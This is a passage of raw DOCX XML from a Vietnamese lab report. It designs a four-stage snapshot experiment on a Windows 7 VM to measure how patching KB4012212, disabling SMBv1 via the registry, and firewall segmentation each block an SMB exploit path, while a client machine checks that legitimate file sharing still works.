          <w:p w14:paraId="62D8886F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>192.168.30.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="27F6E464" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Client SMB Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="45A4908B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Đối chứng nghiệp vụ dương tính (Positive Business Control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10C37108" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="34D40118" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.3. MÔ HÌNH MÁY TRẠNG THÁI ĐƠN BIẾN (SINGLE-VARIABLE CAUSAL STATE MACHINE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443AD09B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.3.1. Thiết kế chuỗi 4 trạng thái Snapshot trên cùng một hệ thống mục tiêu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F61B0D0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Một thiếu sót phổ biến trong các nghiên cứu kiểm thử là triển khai đồng thời hai hoặc nhiều máy ảo khác nhau (ví dụ: máy A chưa vá nhưng bật SMBv1, máy B vừa cài vá vừa tắt SMBv1 vừa chặn tường lửa). Thiết kế này vi phạm nguyên tắc kiểm soát biến số, khiến kết quả không thể xác định được nguyên nhân cốt lõi làm thất bại cuộc tấn công bắt nguồn từ bản vá, từ việc tắt giao thức hay do tường lửa ngăn chặn. Mặt khác, việc khảo sát toàn bộ không gian tổ hợp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2^3 = 8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trạng thái toán học là không cần thiết và thiếu tính thực tiễn trong quản trị an ninh thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C8E1A0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Để thiết lập quan hệ nhân quả chuẩn mực, đề tài sử dụng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>duy nhất một máy ảo mục tiêu Windows 7 SP1 x64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.10.20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) vận hành tuần tự qua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chuỗi 4 trạng thái Snapshot đơn biến</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_0 \to S_1 \to S_2 \to S_3</w:t>
      </w:r>
      <w:r>
        <w:t>). Thiết kế chuỗi tiến trình này dựa trên hai cơ sở học thuật chặt chẽ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1284643C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Vòng đời tăng cường an ninh thực tế (Hardening Lifecycle):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Chuỗi 4 trạng thái mô phỏng chính xác lộ trình phòng thủ chiều sâu (Defense-in-Depth) trong doanh nghiệp: (1) Khắc phục lỗ hổng cốt lõi bằng bản vá của nhà sản xuất (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_0 \to S_1</w:t>
      </w:r>
      <w:r>
        <w:t>); (2) Thu hẹp bề mặt tấn công qua loại bỏ giao thức cũ (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_1 \to S_2</w:t>
      </w:r>
      <w:r>
        <w:t>); (3) Thiết lập hàng rào ngăn cách phân đoạn mạng vật lý/logic (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_2 \to S_3</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C06129C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Tính chất kiểm soát đơn biến nghiêm ngặt:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tại mỗi bước chuyển trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_i \to S_{i+1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, chỉ có đúng một biến can thiệp độc lập được điều chỉnh, trong khi </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>toàn bộ phần cứng ảo, hệ thống tệp và cấu hình hệ điều hành được bảo toàn nguyên vẹn nhờ cơ chế snapshot. Điều này giúp loại trừ các trạng thái tổ hợp phi thực tế trong vận hành (chẳng hạn trạng thái đã chặn mạng nhưng cố tình gỡ bản vá), đồng thời bảo đảm tính xác định đơn trị của nguyên nhân bẻ gãy đường tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1004E016" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bốn trạng thái snapshot được định nghĩa cụ thể:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261577BF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Trạng thái $S_0$ – Vulnerable Baseline (Trạng thái gốc tồn tại lỗ hổng):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209FA65E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cấu hình:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows 7 SP1 x64 nguyên bản (Build 7601), chưa cài đặt gói KB4012212; tính năng SMBv1 được kích hoạt mặc định; Firewall nội bộ cho phép lưu lượng TCP 445/139 từ VLAN 20 và VLAN 30; dịch vụ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hoạt động bình thường [4], [7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE1EAB" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Giá trị tiền điều kiện:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{True}, S = \text{True}, D = \text{True}, V = \text{True}, E = ?, C = ?</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AB5AA4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Ý nghĩa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Xác lập điểm chuẩn ban đầu (baseline), kiểm chứng khả năng phát hiện ở cả 4 cấp độ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC11B39" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Trạng thái $S_1$ – Patch Only (Chỉ áp dụng bản vá an ninh):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3E24C9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Biến thay đổi duy nhất:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cài đặt bản cập nhật an ninh chính thức </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Windows6.1-KB4012212-x64.msu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [4]. Giữ nguyên tính năng SMBv1 đang bật và giữ nguyên chính sách mạng cho phép truy cập cổng 445.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41160D02" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Giá trị tiền điều kiện:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{True}, S = \text{True}, D = \text{True}, \mathbf{V = \text{False}}, E = \text{False}, C = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FDE557" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Ý nghĩa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Chứng minh việc cập nhật bản vá khắc phục khiếm khuyết trong driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (bẻ gãy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>), trong khi khả năng tiếp cận mạng (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>), dịch vụ (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>) và đàm phán SMBv1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>) vẫn tồn tại nguyên vẹn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7853E563" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Trạng thái $S_2$ – SMBv1 Disabled (Vô hiệu hóa giao thức SMBv1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4593FC4D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Biến thay đổi duy nhất:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Giữ nguyên bản vá của </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_1</w:t>
      </w:r>
      <w:r>
        <w:t>, thực thi vô hiệu hóa máy chủ SMBv1 thông qua cấu hình Registry theo tài liệu Microsoft Learn [7]:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="7A91B23A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p w14:paraId="59430132" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">     reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v SMB1 /t REG_DWORD /d 0 /f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="426F5DD2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="456F19C8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Giá trị tiền điều kiện:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{True}, S = \text{True}, \mathbf{D = \text{False}}, V = \text{False}, E = \text{False}, C = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523CD4FD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Ý nghĩa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Chứng minh việc tắt SMBv1 loại bỏ khả năng đàm phán phương ngữ cũ (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>D = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t>), trong khi cổng TCP 445 vẫn mở và dịch vụ chia sẻ tệp qua SMBv2 vẫn duy trì hoạt động (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{True}, S = \text{True}</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C3C4C2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Trạng thái $S_3$ – Firewall / Segmentation Hardened (Gia cố phân đoạn mạng bằng Tường lửa):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5FE799" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Biến thay đổi duy nhất:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Giữ nguyên trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_2</w:t>
      </w:r>
      <w:r>
        <w:t>, thiết lập chính sách lọc gói trên Firewall/UTM chặn toàn bộ lưu lượng TCP 445 và 139 khởi tạo từ VLAN 20 (Pentest) đi sang VLAN 10 (Server); đồng thời duy trì chính sách cho phép lưu lượng TCP 445 từ VLAN 30 (User) đi sang VLAN 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19449701" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Giá trị tiền điều kiện (từ góc độ Pentester):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>\mathbf{R = \text{False}}, S = \text{False}, D = \text{False}, V = \text{False}, E = \text{False}, C = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7761B13D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Ý nghĩa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Chứng minh phân đoạn mạng ngăn chặn khả năng tiếp cận của kẻ tấn công (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t>) từ các phân vùng mạng không tin cậy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D973FB" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.3.2. Vai trò đối chứng nghiệp vụ dương tính của trạm Client tại VLAN 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26436A15" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Một lỗ hổng lớn trong các mô hình kiểm thử an toàn là chỉ tập trung vào việc ngăn chặn tấn công mà bỏ qua tính sẵn sàng của nghiệp vụ (Business Availability). Một biện pháp phòng thủ làm sập hoặc làm gián đoạn việc chia sẻ tệp của người dùng hợp lệ không thể được coi là giải pháp an toàn thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034971E3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Để giải quyết vấn đề này, máy trạm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Client-WinUser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại VLAN 30 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.30.50</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) đóng vai trò là </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>trạm đối chứng nghiệp vụ dương tính (Positive Business Control)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Tại mỗi trạng thái snapshot từ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đến </w:t>
      </w:r>
      <w:r>
        <w:rPr>
